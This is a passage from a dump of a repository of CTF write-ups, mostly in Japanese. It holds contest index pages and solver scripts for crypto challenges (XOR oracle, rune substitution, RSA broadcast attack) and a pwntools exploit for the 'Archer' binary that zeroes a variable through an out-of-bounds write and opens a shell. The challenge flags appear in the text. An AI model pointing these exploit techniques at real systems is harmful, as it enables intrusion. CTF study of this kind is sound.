len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\n\n# 2\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('D')\nio.recvuntil('>>> ')\nc = xor(bytes.fromhex(msg), target_query.encode('utf-8')).hex()\nio.sendline(c)\n\nio.interactive()\n\nio.close()\n```\n\n<!-- bcactf{why-would-you-attack-your-FNES????-4x35rcg} -->\n" }, { "alpha_fraction": 0.26967930793762207, "alphanum_fraction": 0.3644315004348755, "avg_line_length": 28.826086044311523, "blob_id": "22b0386ef81c894ce1833102dfc9cb38302e5fed", "content_id": "c54c9852b0a2b1b0e4b4f1bf35c05e4259fd1c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 688, "license_type": "no_license", "max_line_length": 102, "num_lines": 23, "path": "/2021/Zh3r0_CTF_V2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Zh3r0 CTF V2\n\n* https://ctf.zh3r0.com/\n\n* 2021/06/04 19:30 JST — 2021/06/06 19:30 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ---- | --------------------------------------------- | -------------------------- | ----: | -----: |\n| Misc | [A Small Maniac's game](A_Small_Maniacs_game) | Assembler Language | 100 | 202 |\n| Web | [bxxs](bxxs) | XSS | 100 | 166 |\n| Web | [sparta](sparta) | CVE-2017-5941, unserialize | 100 | 115 |\n\n---\n\n## Result\n\n* 301 points\n\n* 135 / 509 (> 1 pt)\n" }, { "alpha_fraction": 0.3280898928642273, "alphanum_fraction": 0.3758426904678345, "avg_line_length": 45.842105865478516, "blob_id": "f5fdb14847f91486f21953d306adaaa5ff767474", "content_id": "e6de5572d2236f8d3f78b3e64f662b81ff9615c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 96, "num_lines": 38, "path": "/2021/HeroCTF_v3/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# HeroCTF v3\n\n* https://heroctf.fr/\n\n* 2021/04/24 05:00 JST — 2021/04/26 07:00 JST\n\n## Official Writeup\n\n* https://github.com/HeroCTF/HeroCTF_v3\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | -------------------------- | ----: | -----: |\n| Web | [0xSSRF](0xSSRF) | SSRF | 60 | |\n| Misc | [Atoms](Atoms) | Symbol of elements | 50 | |\n| Reversing | [EasyAssembly](EasyAssembly) | Assemble | 40 | |\n| OSINT | [Find Me](Find_Me) | Image search | 10 | |\n| Crypto | [h4XOR](h4XOR) | PNG, XOR | 75 | |\n| Forensic | [HolyAbbot](HolyAbbot) | Ave Maria de Trithème | 15 | |\n| Misc | [Ping Pong](Ping_Pong) | Programing | 45 | |\n| Web | [PwnQL #1](PwnQL_#1) | SQL injection (LIKE) | 50 | |\n| Web | [PwnQL #2](PwnQL_#2) | Blind SQL injection | 75 | |\n| Misc | [Record](Record) | DNS Record | 15 | |\n| Misc | [Russian Doll](Russian_Doll) | | 50 | |\n| Forensic | [We need you 1/5](We_need_you_1_5) | Volatility (PC Name) | 50 | |\n| Forensic | [We need you 2/5](We_need_you_2_5) | Volatility (User Password) | 75 | |\n| Forensic | [We need you 3/5](We_need_you_3_5) | Volatility (IP Port) | 100 | |\n\n---\n\n## Result\n\n* 856 points\n\n* 132 / 645 (> 1 pt)\n" }, { "alpha_fraction": 0.29713425040245056, "alphanum_fraction": 0.36500754952430725, "avg_line_length": 22.714284896850586, "blob_id": "6de223f4a93bdcfc4c090f4fee0a80be06b83475", "content_id": "a21e0f0116650c2907fec044788df20820f08526", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 665, "license_type": "no_license", "max_line_length": 91, "num_lines": 28, "path": "/2021/DiceCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DiceCTF 2021\n\n* https://ctf.dicega.ng/\n\n* 2021/02/06 09:00 JST — 2021/02/08 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------- | ----------------------------- | ----: | -----: |\n| Web | [Babier CSP](./Babier_CSP) | Content Security Policy (CSP) | 107 | |\n| Reversing | [babymix](./babymix) | angr | 110 | |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 218 points\n\n* 274 / 1059 (> 1 pt)" }, { "alpha_fraction": 0.6516854166984558, "alphanum_fraction": 0.7902621626853943, "avg_line_length": 43.66666793823242, "blob_id": "09bad54c2871d197af7d133e639d5b7fb4c0411a", "content_id": "8a120fbdde867cc8c7acf43ccba59596738033da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 106, "num_lines": 6, "path": "/2021/Zh3r0_CTF_V2/sparta/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Spartanians are starting to lose their great power, help them move their objects and rebuild their Empire.\n\nLink - [Sparta](http://web.zh3r0.cf:6666/)\nSource - [source](https://static.zh3r0.com/sparta_0222ce1e9158932bb21b0563280fb15fb428c014.tar.gz)\n\nAuthor - DreyAnd" }, { "alpha_fraction": 0.2682395577430725, "alphanum_fraction": 0.33720508217811584, "avg_line_length": 35.25, "blob_id": "53d72fa40f9316e76b02b7f54f7578493edfac30", "content_id": "3df08ee2780d28a49232d38dea3fce90a02c4516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5652, "license_type": "no_license", "max_line_length": 492, "num_lines": 76, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\n􁫞􇽛􆖓􄺷􏟟 􄧻􆆗􇽛􏟟􊸉􇺟 􏕈􄧻􇽛􊸉􃗁􌘗􄧻􇺟, 􄧻􇺟􉗽 􏕈􄧻􁫞 􃗁􊸉􋐝􊸉􄧻􁫞􊸉􉗽 􄧻􁫞 􇽛􉂫􊸉 􌶴􆆗􃗁􁫞􇽛 􁫞􆆗􇺟􋄚􋐝􊸉 􌶴􃗁􆖓􌘗 􄧻􁫞􇽛􋐝􊸉􉯓'􁫞 􉗽􊸉􆞎􌲔􇽛 􄧻􋐝􆞎􌲔􌘗, 􏕈􉂫􊸉􇺟􊸉􊶬􊸉􃗁 􉯓􆖓􌲔 􇺟􊸉􊸉􉗽 􁫞􆖓􌘗􊸉􆞎􆖓􉗽􉯓 (1987). 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􏕈􄧻􁫞 􄧻 􏕈􆖓􃗁􋐝􉗽􏕈􆆗􉗽􊸉 􇺟􌲔􌘗􆞎􊸉􃗁-􆖓􇺟􊸉 􉂫􆆗􇽛, 􆆗􇺟􆆗􇽛􆆗􄧻􋐝􋐝􉯓 􆆗􇺟 􇽛􉂫􊸉 􌲔􇺟􆆗􇽛􊸉􉗽 􏟟􆆗􇺟􋄚􉗽􆖓􌘗 􆆗􇺟 1987, 􏕈􉂫􊸉􃗁􊸉 􆆗􇽛 􁫞􇽛􄧻􉯓􊸉􉗽 􄧻􇽛 􇽛􉂫􊸉 􇽛􆖓􃄏 􆖓􌶴 􇽛􉂫􊸉 􄺷􉂫􄧻􃗁􇽛 􌶴􆖓􃗁 􌶴􆆗􊶬􊸉 􏕈􊸉􊸉􏟟􁫞 􄧻􇺟􉗽 􏕈􄧻􁫞 􇽛􉂫􊸉 􆞎􊸉􁫞􇽛-􁫞􊸉􋐝􋐝􆆗􇺟􋄚 􁫞􆆗􇺟􋄚􋐝􊸉 􆖓􌶴 􇽛􉂫􄧻􇽛 􉯓􊸉􄧻􃗁. 􆆗􇽛 􊸉􊶬􊸉􇺟􇽛􌲔􄧻􋐝􋐝􉯓 􇽛􆖓􃄏􃄏􊸉􉗽 􇽛􉂫􊸉 􄺷􉂫􄧻􃗁􇽛􁫞 􆆗􇺟 25 􄺷􆖓􌲔􇺟􇽛􃗁􆆗􊸉􁫞, 􆆗􇺟􄺷􋐝􌲔􉗽􆆗􇺟􋄚 􇽛􉂫􊸉 􌲔􇺟􆆗􇽛􊸉􉗽 􁫞􇽛􄧻􇽛􊸉􁫞 􄧻􇺟􉗽 􏕈􊸉􁫞􇽛 􋄚􊸉􃗁􌘗􄧻􇺟􉯓.[6] 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􏕈􆖓􇺟 􆞎􊸉􁫞􇽛 􆞎􃗁􆆗􇽛􆆗􁫞􉂫 􁫞􆆗􇺟􋄚􋐝􊸉 􄧻􇽛 􇽛􉂫􊸉 1988 􆞎􃗁􆆗􇽛 􄧻􏕈􄧻􃗁􉗽􁫞.\n\n􇽛􉂫􊸉 􌘗􌲔􁫞􆆗􄺷 􊶬􆆗􉗽􊸉􆖓 􌶴􆖓􃗁 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􉂫􄧻􁫞 􆞎􊸉􄺷􆖓􌘗􊸉 􇽛􉂫􊸉 􆞎􄧻􁫞􆆗􁫞 􌶴􆖓􃗁 􇽛􉂫􊸉 \"􃗁􆆗􄺷􏟟􃗁􆖓􋐝􋐝􆆗􇺟􋄚\" 􆆗􇺟􇽛􊸉􃗁􇺟􊸉􇽛 􌘗􊸉􌘗􊸉. 􆆗􇺟 2008, 􄧻􁫞􇽛􋐝􊸉􉯓 􏕈􆖓􇺟 􇽛􉂫􊸉 􌘗􇽛􊶬 􊸉􌲔􃗁􆖓􃄏􊸉 􌘗􌲔􁫞􆆗􄺷 􄧻􏕈􄧻􃗁􉗽 􌶴􆖓􃗁 􆞎􊸉􁫞􇽛 􄧻􄺷􇽛 􊸉􊶬􊸉􃗁 􏕈􆆗􇽛􉂫 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚, 􄧻􁫞 􄧻 􃗁􊸉􁫞􌲔􋐝􇽛 􆖓􌶴 􄺷􆖓􋐝􋐝􊸉􄺷􇽛􆆗􊶬􊸉 􊶬􆖓􇽛􆆗􇺟􋄚 􌶴􃗁􆖓􌘗 􇽛􉂫􆖓􌲔􁫞􄧻􇺟􉗽􁫞 􆖓􌶴 􃄏􊸉􆖓􃄏􋐝􊸉 􆖓􇺟 􇽛􉂫􊸉 􆆗􇺟􇽛􊸉􃗁􇺟􊸉􇽛, 􉗽􌲔􊸉 􇽛􆖓 􇽛􉂫􊸉 􃄏􆖓􃄏􌲔􋐝􄧻􃗁 􃄏􉂫􊸉􇺟􆖓􌘗􊸉􇺟􆖓􇺟 􆖓􌶴 􃗁􆆗􄺷􏟟􃗁􆖓􋐝􋐝􆆗􇺟􋄚.[7] 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􆆗􁫞 􄺷􆖓􇺟􁫞􆆗􉗽􊸉􃗁􊸉􉗽 􄧻􁫞􇽛􋐝􊸉􉯓'􁫞 􁫞􆆗􋄚􇺟􄧻􇽛􌲔􃗁􊸉 􁫞􆖓􇺟􋄚 􄧻􇺟􉗽 􆆗􇽛 􆆗􁫞 􆖓􌶴􇽛􊸉􇺟 􃄏􋐝􄧻􉯓􊸉􉗽 􄧻􇽛 􇽛􉂫􊸉 􊸉􇺟􉗽 􆖓􌶴 􉂫􆆗􁫞 􋐝􆆗􊶬􊸉 􄺷􆖓􇺟􄺷􊸉􃗁􇽛􁫞.\n\n􆆗􇺟 2019, 􄧻􁫞􇽛􋐝􊸉􉯓 􃗁􊸉􄺷􆖓􃗁􉗽􊸉􉗽 􄧻􇺟􉗽 􃗁􊸉􋐝􊸉􄧻􁫞􊸉􉗽 􄧻 '􃄏􆆗􄧻􇺟􆖓􌶴􆖓􃗁􇽛􊸉' 􊶬􊸉􃗁􁫞􆆗􆖓􇺟 􆖓􌶴 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􌶴􆖓􃗁 􉂫􆆗􁫞 􄧻􋐝􆞎􌲔􌘗 􇽛􉂫􊸉 􆞎􊸉􁫞􇽛 􆖓􌶴 􌘗􊸉, 􏕈􉂫􆆗􄺷􉂫 􌶴􊸉􄧻􇽛􌲔􃗁􊸉􁫞 􄧻 􇺟􊸉􏕈 􃄏􆆗􄧻􇺟􆖓 􄧻􃗁􃗁􄧻􇺟􋄚􊸉􌘗􊸉􇺟􇽛.[8]\n\n􁫞􉂫􄧻􌘗􊸉􋐝􊸉􁫞􁫞􋐝􉯓 􄺷􆖓􃄏􆆗􊸉􉗽 􌶴􃗁􆖓􌘗 [􏕈􆆗􏟟􆆗􃄏􊸉􉗽􆆗􄧻'􁫞 􄧻􃗁􇽛􆆗􄺷􋐝􊸉 􆖓􇺟 􇽛􉂫􊸉 􁫞􌲔􆞎􀴠􊸉􄺷􇽛](􉂫􇽛􇽛􃄏􁫞://􊸉􇺟.􏕈􆆗􏟟􆆗􃄏􊸉􉗽􆆗􄧻.􆖓􃗁􋄚/􏕈􆆗􏟟􆆗/􇺟􊸉􊶬􊸉􃗁_􋄚􆖓􇺟􇺟􄧻_􋄚􆆗􊶬􊸉_􉯓􆖓􌲔_􌲔􃄏)\n\n􆞎􄺷􄧻􄺷􇽛􌶴{􁫞􆖓􃗁􃗁􉯓_􏕈􊸉_􃗁􄧻􇺟_􆖓􌲔􇽛_􆖓􌶴_􃗁􌲔􇺟􊸉􁫞_􁫞􀴠􃗁􉂫􏕈􆞎􋄚}\n```\n\n読めない文字は、バイナリにしてみると必ず`F4`から始まる4バイトになっていることが分かった。\n\n文字列中の`XXXXX://`は`https://`だろうと予測して`F4`から始まる4バイトを別のアルファベットに変換していったところ、フラグが得られた。\n\n```py\ncipher = open(\"ciphertext.md\",\"rb\").read()\n\nbyte = []\nfor i,c in enumerate(cipher):\n if(c == 0xf4):\n if(cipher[i:i+4] not in byte):\n byte.append(cipher[i:i+4])\n\nbyte = sorted(byte)\n\n# byte = [b'\\xf4\\x80\\xb4\\xa0', b'\\xf4\\x81\\xab\\x9e', b'\\xf4\\x83\\x84\\x8f', b'\\xf4\\x83\\x97\\x81', b'\\xf4\\x84\\xa7\\xbb', b'\\xf4\\x84\\xba\\xb7', b'\\xf4\\x86\\x86\\x97', b'\\xf4\\x86\\x96\\x93', b'\\xf4\\x86\\x9e\\x8e', b'\\xf4\\x87\\xba\\x9f', b'\\xf4\\x87\\xbd\\x9b', b'\\xf4\\x89\\x82\\xab', b'\\xf4\\x89\\x97\\xbd', b'\\xf4\\x89\\xaf\\x93', b'\\xf4\\x8a\\xb6\\xac', b'\\xf4\\x8a\\xb8\\x89', b'\\xf4\\x8b\\x84\\x9a', b'\\xf4\\x8b\\x90\\x9d', b'\\xf4\\x8c\\x98\\x97', b'\\xf4\\x8c\\xb2\\x94', b'\\xf4\\x8c\\xb6\\xb4', b'\\xf4\\x8f\\x95\\x88', b'\\xf4\\x8f\\x9f\\x9f']\nchar = [ \"(\" + str(i) + \")\" for i in range(len(byte))]\n\n# guess from result\nchar[11] = \"h\"\nchar[10] = \"t\"\nchar[2] = \"p\"\nchar[1] = \"s\"\nchar[8] = \"b\"\nchar[5] = \"c\"\nchar[4] = \"a\"\nchar[20] = \"f\"\nchar[15] = \"e\"\nchar[19] = \"u\"\nchar[3] = \"r\"\nchar[7] = \"o\"\nchar[9] = \"n\"\nchar[12] = \"d\" \nchar[17] = \"l\"\nchar[6] = \"i\"\nchar[21] = \"w\"\nchar[22] = \"k\"\nchar[16] = \"g\"\nchar[14] = \"v\"\nchar[13] = \"y\"\nchar[0] = \"j\"\nchar[18] = \"m\"\n\ntranslate = dict(zip(byte,char))\n\nplain = \"\"\ncnt = 0\nwhile(cnt < len(cipher)):\n c = cipher[cnt]\n if(c == 0xf4):\n plain += translate[cipher[cnt:cnt+4]]\n cnt += 4\n else:\n plain += chr(cipher[cnt])\n cnt += 1\n\nprint(plain)\n```\n\n<!-- bcactf{sorry_we_ran_out_of_runes_sjrhwbg} -->\n" }, { "alpha_fraction": 0.32775330543518066, "alphanum_fraction": 0.3841409683227539, "avg_line_length": 39.53571319580078, "blob_id": "422be2599307826f94efa886b7f3f21850eb0fd5", "content_id": "9e02d26f1be7ecb4d54a349f1368bdb25caf7e93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1135, "license_type": "no_license", "max_line_length": 94, "num_lines": 28, "path": "/2021/ImaginaryCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ImaginaryCTF 2021\n\n* https://2021.imaginaryctf.org/\n\n* 2021/07/24 01:00 JST - 2021/07/28 01:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------------------- | -------------- | ----: | -----: |\n| Web | [Build-A-Website](Build-A-Website) | SSTI | 100 | ? |\n| Crypto | [Chicken Caesar Salad](Chicken_Caesar_Salad) | ROT | 50 | ? |\n| Misc | [Formatting](Formatting) | Python, format | 100 | ? |\n| Forensics | [Hidden](Hidden) | strings | 50 | ? |\n| Misc | [Imaginary](Imaginary) | PPC | 100 | ? |\n| Crypto | [Rock Solid Algorithm](Rock_Solid_Algorithm) | RSA, e=5 | 100 | ? |\n| Web | [Roos World](Roos_World) | Devtools | 50 | ? |\n| Pwn | [stackoverflow](stackoverflow) | BOF | 50 | ? |\n\n---\n\n## Result\n\n* 630 points\n\n* 309 / 1018 (> 1 pt)\n" }, { "alpha_fraction": 0.6020671725273132, "alphanum_fraction": 0.6459948420524597, "avg_line_length": 18.399999618530273, "blob_id": "77ca8d8be874454af61d09735de51fe53d8011e3", "content_id": "e6ffb0998055fb09189af7606b017795247a5f92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 40, "num_lines": 20, "path": "/2020/WaniCTF/exclusive/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ファイル読み込み\nwith open('./output.txt') as f:\n ciphertext = f.read()\n\n# s1,s2に対してXOR演算を行う\ndef decrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2))\n return result\n\n# 先頭3文字のXORをとってKeyを計算\nkey = decrypt(ciphertext[0:3],'FLA')\n\n# Keyの繰り返しと暗号文のXORを計算\nplaintext = decrypt(key*19,ciphertext)\n\nprint(plaintext)" }, { "alpha_fraction": 0.3014425039291382, "alphanum_fraction": 0.34959694743156433, "avg_line_length": 84.70909118652344, "blob_id": "a629c920de1ccf0bd9b163d3aa200468853d31b9", "content_id": "0fff9dd85b0ce344b4f54fb0daefdc15245c55d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 136, "num_lines": 55, "path": "/2021/BCACTF_2.0/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# BCACTF 2.0\n\n* https://bcactf.com/\n\n * https://github.com/BCACTF\n\n* 2021/06/11 09:00 JST — 2021/06/14 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ----------------------------------------------------------------- | ----------------------------------- | ----: | -----: |\n| Web | [Agent Gerald](Agent_Gerald) | User Agent | 125 | 458 |\n| Pwn | [BCA Mart](BCA_Mart) | integer overflow | 75 | 279 |\n| Crypto | [Cipher Mishap](Cipher_Mishap) | Octal, ROT | 75 | 188 |\n| Web | [Countdown Timer](Countdown_Timer) | Devtools, JavaScript | 75 | 435 |\n| Reversing | [Digitally Encrypted 1](Digitally_Encrypted_1 ) | XOR, Circuit diagram | 75 | 172 |\n| Crypto | [Easy RSA](Easy_RSA) | RSA | 50 | 394 |\n| Crypto | [FNES 1](FNES_1) | XOR | 150 | 50 |\n| Forensics | [Gerald's New Job](Geralds_New_Job) | PDF, binwalk | 100 | 251 |\n| Web | [Home Automation](Home_Automation) | Cookie | 75 | 566 |\n| Pwn | [Honors ABCs](Honors_ABCs) | Buffer overflow | 75 | 254 |\n| Forensics | [Infinite Zip](Infinite_Zip) | zip | 75 | 347 |\n| Forensics | [It's All Coming Together](Its_All_Coming_Together) | continued fraction | 175 | 8 |\n| Misc | [I Can Haz Interwebz?](I_Can_Haz_Interwebz) | nc | 50 | 575 |\n| Crypto | [Little e](Little_e) | RSA, e=3 | 100 | 231 |\n| Forensics | [More than Meets the Eye](More_than_Meets_the_Eye) | Zero width space (ZWSP) | 100 | 177 |\n| Web | [Movie-Login-1](Movie-Login-1) | SQL injection | 100 | 460 |\n| Web | [Movie-Login-2](Movie-Login-2) | SQL injection | 150 | 346 |\n| Web | [Movie-Login-3](Movie-Login-3) | SQL injection | 200 | 295 |\n| Crypto | [RSAtrix 1](RSAtrix_1) | RSA | 125 | 119 |\n| Crypto | [RSAtrix 2](RSAtrix_2) | RSA, matrix | 200 | 42 |\n| Crypto | [Sailing Thru Decryption](Sailing_Thru_Decryption) | International maritime signal flags | 75 | 161 |\n| Forensics | [Secure Zip](Secure_Zip) | zip, John The Ripper | 100 | 286 |\n| Crypto | [Slightly Harder RSA](Slightly_Harder_RSA) | RSA, n factorization | 75 | 312 |\n| Reversing | [Storytime: The Opening Gambit](Storytime_The_Opening_Gambit) | strings | 75 | 363 |\n| Reversing | [Storytime: The Tragic Interlude](Storytime_The_Tragic_Interlude) | Ghidra | 125 | 143 |\n| Reversing | [Wait, this isn't C](Wait_this_isnt_C) | Ghidra, edit binary | 150 | 118 |\n| Web | [Wasm Protected Site 1](Wasm_Protected_Site_1) | wasm | 100 | 438 |\n| Web | [Wasm Protected Site 2](Wasm_Protected_Site_2) | wasm, debug | 250 | 102 |\n| Misc | [Welcome to the Casino](Welcome_to_the_Casino) | nc script | 125 | 98 |\n| Forensics | [Zstegosaurus](Zstegosaurus) | zsteg | 75 | 306 |\n| Crypto | [􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉](􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉) | substitution | 75 | 164 |\n\n---\n\n## Result\n\n* 3450 points\n\n* 87 / 841 (> 1 pt)\n\n* 87 / 962\n" }, { "alpha_fraction": 0.5340101718902588, "alphanum_fraction": 0.5857868194580078, "avg_line_length": 20.413043975830078, "blob_id": "b0b7410d5097170d672a61b2fbadba4220309222", "content_id": "163145cdf51f663fc6e02fc51ca004594b3be463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2199, "license_type": "no_license", "max_line_length": 116, "num_lines": 92, "path": "/2021/RaRCTF_2021/unrandompad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\nfrom random import getrandbits\nfrom Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long\n\ndef keygen(): # normal rsa key generation\n primes = []\n e = 3\n for _ in range(2):\n while True:\n p = getPrime(1024)\n if (p - 1) % 3:\n break\n primes.append(p)\n return e, primes[0] * primes[1]\n\ndef pad(m, n): # pkcs#1 v1.5\n ms = long_to_bytes(m)\n ns = long_to_bytes(n)\n if len(ms) >= len(ns) - 11:\n return -1\n padlength = len(ns) - len(ms) - 3\n ps = long_to_bytes(getrandbits(padlength * 8)).rjust(padlength, b\"\\x00\")\n return int.from_bytes(b\"\\x00\\x02\" + ps + b\"\\x00\" + ms, \"big\")\n\ndef encrypt(m, e, n): # standard rsa\n res = pad(m, n)\n if res != -1:\n print(f\"c: {pow(m, e, n)}\")\n else:\n print(\"error :(\", \"message too long\")\n\nmenu = \"\"\"\n[1] enc()\n[2] enc(flag)\n[3] quit\n\"\"\"[1:]\n\ne, n = keygen()\nprint(f\"e: {e}\")\nprint(f\"n: {n}\")\nwhile True:\n try:\n print(menu)\n opt = input(\"opt: \")\n if opt == \"1\":\n encrypt(int(input(\"msg: \")), e, n)\n elif opt == \"2\":\n encrypt(bytes_to_long(open(\"/challenge/flag.txt\", \"rb\").read()), e, n)\n elif opt == \"3\":\n print(\"bye\")\n exit(0)\n else:\n print(\"idk\")\n except Exception as e:\n print(\"error :(\", e)\n```\n\n中身は`e=3`のRSA暗号である。`pad`関数は暗号化に使われていないため、無視してもよい。\n\nおそらく暗号文が長いため、3乗根を取るだけではうまくいかない。\n\n接続しなおせば、`n`が異なる`c`が複数個分かるるため、Håstad's Broadcast Attackを使って平文\nを求める。\n\n```py\n# sage\nfrom pwn import *\nimport re\nfrom Crypto.Util.number import *\n\ne, n, c = 3, [], []\n\nfor _ in range(3):\n io = remote('193.57.159.27', 28572)\n io.recvline() # e\n n.append(int(re.search(r'n: (\\d+)' , str(io.recvline())).group(1)))\n\n io.recvuntil('opt: ')\n io.sendline('2')\n c.append(int(re.search(r'c: (\\d+)' , str(io.recvline())).group(1)))\n io.close()\n\nx = CRT_list(c,n)\n\nprint(long_to_bytes(x^(1/e)))\n```\n\n<!-- rarctf{https://cdn.discordapp.com/attachments/751845431063085160/866641917714235392/unknown.png_8538853c64} -->\n" }, { "alpha_fraction": 0.5447306632995605, "alphanum_fraction": 0.6421545743942261, "avg_line_length": 18.768518447875977, "blob_id": "c7a52cb7d0273c064fd4cff7e9c7493df582691f", "content_id": "c2cd9711e15c2109a4888b58dc971ce9544afc26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2373, "license_type": "no_license", "max_line_length": 83, "num_lines": 108, "path": "/2021/RaRCTF_2021/Archer/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ ./archer\nIt's battle day archer! Have you got what it takes?\nAnswer [yes/no]: yes\nAwesome! Make your shot.\nHere's your arrow!\nNow, which soldier do you wish to shoot?\nhoge\n[1] 28581 segmentation fault ./archer\n```\n\nGhidraで解析してみる。\n\n```c\nundefined8 main(void)\n\n{\n char *pcVar1;\n char local_d [5];\n \n puts(\"It\\'s battle day archer! Have you got what it takes?\");\n printf(\"Answer [yes/no]: \");\n fflush(stdout);\n fgets(local_d,5,stdin);\n pcVar1 = strstr(local_d,\"no\");\n if (pcVar1 != (char *)0x0) {\n puts(\"Battle isn\\'t for everyone.\");\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n puts(\"Awesome! Make your shot.\");\n makeshot();\n puts(\"Hope you shot well! This will decide the battle.\");\n if (code == 0x13371337) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n puts(\"WE WON!\");\n fflush(stdout);\n system(\"/bin/sh\");\n return 0;\n}\n\n\nvoid makeshot(void)\n\n{\n undefined8 *local_10;\n \n puts(\"Here\\'s your arrow!\");\n puts(\"Now, which soldier do you wish to shoot?\");\n fflush(stdout);\n __isoc99_scanf(&DAT_00402109,&local_10);\n local_10 = local_10 + 0xa0000;\n *local_10 = 0;\n puts(\"Shot!\");\n return;\n}\n```\n\n`makeshot`関数では、入力した値 + 0x500000 のアドレスの中身を`0`に書き換えてくれることが分かった。\n\n```\n004012c0 48 05 00 ADD RAX,0x500000\n 00 50 00\n\n↓\n\nlocal_10 = local_10 + 0xa0000;\n```\n\nこれを利用して、`main`関数内の`code`変数を`0`に書き換える。\n\n`code`変数は`0x404068`に確保されていることが分かったので、`0x404068-0x500000`の値を渡すと`code`変数が`0`に書き換えられる。\n\n```py\nfrom pwn import *\n\ne = ELF('archer')\nio = remote('193.57.159.27', 23258)\n\nio.recvuntil(': ')\nio.sendline('yes')\nio.recvuntil('?\\n')\nh = str(hex(e.symbols['code']-0x500000)).replace('0x','')\nio.sendline(h)\nio.interactive()\n```\n\n```bash\n$ python3 solver.py\n[+] Opening connection to 193.57.159.27 on port 23258: Done\n[*] Switching to interactive mode\nShot!\nHope you shot well! This will decide the battle.\nWE WON!\n$ ls\narcher\nflag_0a52f21b1a.txt\n$ cat flag_0a52f21b1a.txt\nrarctf{sw33t_sh0t!_1nt3g3r_0v3rfl0w_r0cks!_170b2820c9}\n```\n\n<!-- rarctf{sw33t_sh0t!_1nt3g3r_0v3rfl0w_r0cks!_170b2820c9} -->\n" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6641790866851807, "avg_line_length": 25.799999237060547, "blob_id": "1fd7cf4d9eab73c17118f4a52947d8e5c1db9823", "content_id": "902476e354d954700c2277a223afe95a271cd834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 78, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Simple_conversion/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nc = open(os.path.dirname(__file__)+\"/cry-simple-conversion/output.txt\").read()\nm = bytes.fromhex(hex(int(c))[2:])\nprint(m)\n" }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.7955800890922546, "avg_line_length": 59.33333206176758, "blob_id": "f57df9d5b72eca11db6db15ec01e4e5aa51b3abe", "content_id": "f4b630238d6b014050f43f3ee309774c86f95a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 107, "num_lines": 3, "path": "/2021/dCTF_2021/Bad_Apple/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Someone stumbled upon this file in a secure server. What could it 